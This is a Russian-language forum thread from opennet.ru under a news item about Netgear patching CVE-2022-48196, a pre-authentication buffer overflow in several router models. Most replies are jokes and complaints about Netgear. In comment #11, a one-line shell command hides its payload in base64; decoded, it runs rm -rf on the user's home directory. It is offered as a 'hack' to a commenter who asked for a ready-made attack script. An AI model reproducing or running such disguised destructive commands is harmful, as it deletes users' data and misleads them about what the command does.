The OpenNET Project / Index page

[ новости /+++ | форум | теги | ]



"Уязвимость в устройствах Netgear, эксплуатируемая на стадии до аутентификации"
Вариант для распечатки  
Пред. тема | След. тема 
Форум Разговоры, обсуждение новостей
Изначальное сообщение [ Отслеживать ]

"Уязвимость в устройствах Netgear, эксплуатируемая на стадии до аутентификации"  +/
Сообщение от opennews (??), 03-Янв-23, 09:34 
Компания Netgear выпустила обновление прошивок к беспроводным маршрутизаторам серий RAX40, RAX35, R6400v2, R6700v3, R6900P, R7000P, R7000, R7960P и R8000P, в которых устранена уязвимость (CVE-2022-48196), позволяющая добиться переполнения буфера без прохождения аутентификации. Технические детали и информация о наличии эксплоитов пока не приводится, но судя по выставленному уровню опасности и рекомендации незамедлительно обновить прошивку, проблема напоминает ноябрьскую уязвимость, позволявшую добиться выполнения своего кода с правами root через манипуляции во внешней сети на стороне WAN-интерфейса...

Подробнее: https://www.opennet.ru/opennews/art.shtml?num=58421

Ответить | Правка | Cообщить модератору

Оглавление

Сообщения [Сортировка по ответам | RSS]

1. Сообщение от Аноним (1), 03-Янв-23, 09:34   +2 +/
Готовый скрипт есть у кого? Чтобы сразу запустил, и всех поломал, не вникая в скучные детали?
Ответить | Правка | Наверх | Cообщить модератору
Ответы: #2, #3, #6

2. Сообщение от Аноним (2), 03-Янв-23, 09:39   +2 +/
Да
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #1

3. Сообщение от Аноним (3), 03-Янв-23, 09:39   +/
Кнопка "сделать мне всё за***сь"? Вернее, "сделать меня кулхацкором"
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #1

4. Сообщение от Аноним (4), 03-Янв-23, 10:32   –2 +/
хорошая закладка для господина Майора... хорошая.
Теперь прийдется новую делать - отстой..
Ответить | Правка | Наверх | Cообщить модератору
Ответы: #8, #9

5. Сообщение от InuYasha (??), 03-Янв-23, 11:30   +/
Эти хоть патчат - и то молодцы.
Ответить | Правка | Наверх | Cообщить модератору

6. Сообщение от Аноним (6), 03-Янв-23, 11:53   +3 +/
HACK=`echo "ZGF0ZQo=" | base64 -d`; sh -c $HACK
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #1 Ответы: #11

7. Сообщение от Аноним (7), 03-Янв-23, 11:56   –1 +/
>CVE-2022-48196
>2022

А обновление выпущено в 2023, а не в тот же день! Если об уязвимости они узнали не за час до Нового Года, то оперативность просто поражает. За такой интервал всех, кого нужно, уже поимели.

Ответить | Правка | Наверх | Cообщить модератору
Ответы: #14

8. Сообщение от Аноним (8), 03-Янв-23, 12:31   +/
прежнего майора повысили, не гоже оставлять свои наработки для молодняка
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #4

9. Сообщение от Аноним (9), 03-Янв-23, 12:40   –1 +/
Ты что это же теория заговора, ай-яй-яй. Ты же знаешь что теорий заговора не существует, а тебе должно быть стыдно за то что ты поднял голову и начал ей думать самостоятельно.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #4 Ответы: #20

11. Сообщение от aploskov.dev (ok), 03-Янв-23, 13:30   –2 +/
Тогда уж, чтоб запомнилось.

HACK=`echo 'cm0gLXJmICIvaG9tZS8kVVNFUi8qIg==' | base64 -d`; sh -c $HACK

Ответить | Правка | Наверх | Cообщить модератору
Родитель: #6

12. Сообщение от Аноним (-), 03-Янв-23, 14:11   +/
> переполнения буфера

Годы идут, но нестареющая классика продолжает радовать людей.

Ответить | Правка | Наверх | Cообщить модератору
Ответы: #18

14. Сообщение от Атон (?), 03-Янв-23, 14:29   +/
> Если об уязвимости они узнали не за час до Нового Года, то оперативность просто поражает. За такой интервал всех, кого нужно, уже поимели.

Всех, кого нужно, поимели задолго до того.  Так и узнали об уязвимости.

Ответить | Правка | Наверх | Cообщить модератору
Родитель: #7

15. Сообщение от Аноним (15), 03-Янв-23, 18:51   +2 +/
Даже у нетгира нет денег и авторитета нанять настоящих сишников…
Ответить | Правка | Наверх | Cообщить модератору
Ответы: #16, #17

16. Сообщение от Аноним (19), 03-Янв-23, 21:40   +1 +/
Ору.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #15

17. Сообщение от Аноним (-), 04-Янв-23, 00:21   +/
Да они так то довольно среднепаршивая фирма. По жизни всякая хня с прошивками.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #15

18. Сообщение от Аноним (18), 04-Янв-23, 00:59   +1 +/
Буфера всегда радуют. Ну где-то с 13 лет и до самой старости.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #12 Ответы: #19

19. Сообщение от Аноним (19), 04-Янв-23, 09:52   +1 +/
Особенно, когда удаётся выйти за границы буфера.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #18

20. Сообщение от Кирилл (??), 04-Янв-23, 12:49   +/
О том и речь, что конспирология и "думать головой" - это вещи взаимоисключающие.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #9

21. Сообщение от Омоним (?), 06-Янв-23, 02:59   +/
Пластик у Netgear-овского железа - просто оцтой. А тут еще и вот это сцамое.
Ответить | Правка | Наверх | Cообщить модератору


Архив | Удалить

Рекомендовать для помещения в FAQ | Индекс форумов | Темы | Пред. тема | След. тема




Партнёры:
PostgresPro
Inferno Solutions
Hosting by Hoster.ru
Хостинг:

Закладки на сайте
Проследить за страницей
Created 1996-2024 by Maxim Chirkov
Добавить, Поддержать, Вебмастеру